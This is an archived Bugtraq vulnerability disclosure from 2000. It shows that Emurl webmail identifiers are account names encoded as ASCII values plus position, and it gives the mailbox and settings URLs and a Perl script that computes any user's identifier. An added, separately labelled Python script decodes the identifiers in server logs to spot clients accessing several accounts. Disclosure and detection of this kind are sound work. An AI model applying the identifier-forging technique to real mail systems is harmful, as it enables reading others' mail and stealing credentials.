Bugtraq mailing list archives

Vulnerability in EMURL-based e-mail providers


From: pbenoit () MAIL COM (Pierre Benoit)
Date: Mon, 15 May 2000 12:33:23 -0400


Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is a web-based email host developed by SeattleLab.
http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox contents of anybody on the system.
They can also steal their POP passwords since Emurl allows you to fetch your
POP email from more than one source.

Description:
After logging into my new mail account powered by the Emurl software, this
URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account with the
same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier can easily be determined since it is "encoded"
using the ASCII value of each character of the account's name,
incremented by its position.

In this example, my user ID would be PBenoit and my resulting identifier
would be 113100104114116111123.

p = 112 + 1 = 113
b = 98  + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123

You could fetch the e-mails here

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>

... and view/change the account's settings here

http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>

I threw a few lines of perl together to generate this.

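# Read the account name; the identifier is derived from its lowercase form.
print "Enter your ID: ";
$_ = lc(<STDIN>); chomp;
print "Your identifier is: ";
@letters = split(//, $_);
for ($i = 0; $i < length($_); $i++) {
    # ASCII value of the character plus its 1-based position
    $mychar = ord($letters[$i]) + $i + 1;
    # Zero-pad to three digits
    if ($mychar < 100) { $mychar = "0" . $mychar; }
    print $mychar;
}
print "\n";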

Vendor status: SeattleLab is aware and the issue is addressed in their next
version.
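
For administrators reviewing web server logs on an affected install, the following is an added example (not part of the original post and not SeattleLab code) that inverts the encoding described above and flags clients whose requests carry identifiers for more than one account. The log layout (client address, a space, then the request URL), the fixed three-digit grouping taken from the Perl script, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines: "<client address> <request URL>".
SAMPLE_LOG = """\
10.0.0.5 /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123
10.0.0.5 /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=113100104114116111123
10.0.0.9 /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=099113101
10.0.0.9 /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=107113104
10.0.0.9 /scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=113100104114116111123
10.0.0.7 /scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=12ab
"""


def decode_identifier(ident):
    """Invert the scheme: 3-digit groups, each = ASCII code + 1-based position."""
    if not re.fullmatch(r"(\d{3})+", ident):
        return None
    chars = []
    for pos, start in enumerate(range(0, len(ident), 3), start=1):
        code = int(ident[start:start + 3]) - pos
        if not 32 <= code <= 126:  # outside printable ASCII: not a valid identifier
            return None
        chars.append(chr(code))
    return "".join(chars)


def audit(log_text):
    """Return ({client: accounts} for clients seen with >1 account, undecodable lines)."""
    seen = defaultdict(set)
    undecodable = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, _, url = line.partition(" ")
        for ident in parse_qs(urlsplit(url).query).get("USER", []):
            account = decode_identifier(ident)
            if account is None:
                undecodable.append(line)
            else:
                seen[client].add(account)
    suspects = {c: sorted(a) for c, a in seen.items() if len(a) > 1}
    return suspects, undecodable


if __name__ == "__main__":
    print(audit(SAMPLE_LOG))
```

A shared proxy or NAT address can legitimately show several accounts, so treat a hit as a lead to correlate with login records rather than as proof of misuse.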
